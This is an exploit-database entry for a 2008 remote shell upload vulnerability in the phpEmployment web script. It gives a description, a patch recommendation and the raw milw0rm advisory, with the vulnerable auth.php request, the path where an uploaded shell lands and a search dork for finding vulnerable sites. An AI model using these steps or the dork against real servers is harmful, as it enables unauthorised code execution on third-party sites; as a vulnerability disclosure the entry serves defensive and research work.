header-logo
Suggest Exploit
vendor:
phpEmployment
by:
ahmadbady
7.5
CVSS
HIGH
Remote File Upload
434
CWE
Product Name: phpEmployment
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

remote shell upload

A vulnerability in phpEmployment allows an attacker to upload a malicious file to the server. The vulnerability exists in the auth.php script, which allows an attacker to upload a file with the parameter mode=regnew&adtype=job. The uploaded file can be accessed via the photoes/number_shell.php path.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to update to the latest version of phpEmployment.
Source

Exploit-DB raw data:

****(remote shell upload)****

script: phpEmployment
   
***************************************************************************
download from:http://www.w2b.ru/download/phpEmployment.zip
   
***************************************************************************
www.site.com/path/auth.php?mode=regnew&adtype=job

shell: www.site.com/path/photoes/number_shell.php

----------------------------------------------------------------------------------------
dork:"powered by phpEmployment"
------------------------------------------------------------------------------------------  
**************************************************


Author: ahmadbady 

**************************************************

# milw0rm.com [2008-12-23]